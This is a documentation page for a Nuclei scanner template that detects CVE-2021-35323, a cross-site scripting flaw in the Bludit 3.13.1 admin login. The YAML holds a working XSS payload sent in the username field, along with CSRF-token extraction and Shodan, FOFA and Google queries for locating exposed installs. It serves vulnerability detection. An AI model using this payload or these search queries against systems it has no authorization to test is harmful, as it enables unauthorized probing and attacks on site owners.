Skip to content
Nuclei Templates

Bludit 3.13.1 - Cross Site Scripting

ID: CVE-2021-35323

Severity: medium

Author: r3Y3r53

Tags: cve2021,cve,bludit,xss

Description

Section titled “Description”

Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login

YAML Source

Section titled “YAML Source”
id: CVE-2021-35323


info:
  name: Bludit 3.13.1 - Cross Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    Cross Site Scripting (XSS) vulnerability exists in bludit 3-13-1 via the username in admin/login
  remediation: Bludit v4.0.0
  reference:
    - https://github.com/bludit/bludit/issues/1327
    - https://nvd.nist.gov/vuln/detail/CVE-2021-35323
    - https://github.com/ARPSyndicate/cvemon
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2021-35323
    cwe-id: CWE-79
    epss-score: 0.00183
    epss-percentile: 0.55471
    cpe: cpe:2.3:a:bludit:bludit:3.13.1:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: bludit
    product: bludit
    shodan-query:
      - title:"Bludit"
      - http.title:"bludit"
    fofa-query: title="bludit"
    google-query: intitle:"bludit"
  tags: cve2021,cve,bludit,xss


http:
  - raw:
      - |
        GET /bludit/admin/login HTTP/1.1
        Host: {{Hostname}}
      - |
        @timeout: 10s
        POST /bludit/admin/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded


        tokenCSRF={{tokenCSRF}}&username=admin%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&password=pass&save=


    host-redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_2 == 200'
          - 'contains(content_type_2, "text/html")'
          - 'contains(body_2, "<img src=x onerror=alert(document.domain)>") && contains(body_2, "Bludit")'
        condition: and


    extractors:
      - type: regex
        name: tokenCSRF
        part: body
        group: 1
        regex:
          - 'type="hidden" id="jstokenCSRF" name="tokenCSRF" value="(.*)"'
        internal: true
# digest: 4a0a004730450220671580513c6289aacfd9246c1b1c7a56e6b1430fc8e021e076fe32fcdcbbae4f022100a8e7b88265dbd7b3a5156f4236ba29ddc233fac52e4325cc3da763ee538f41e2:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-35323.yaml"

View on Github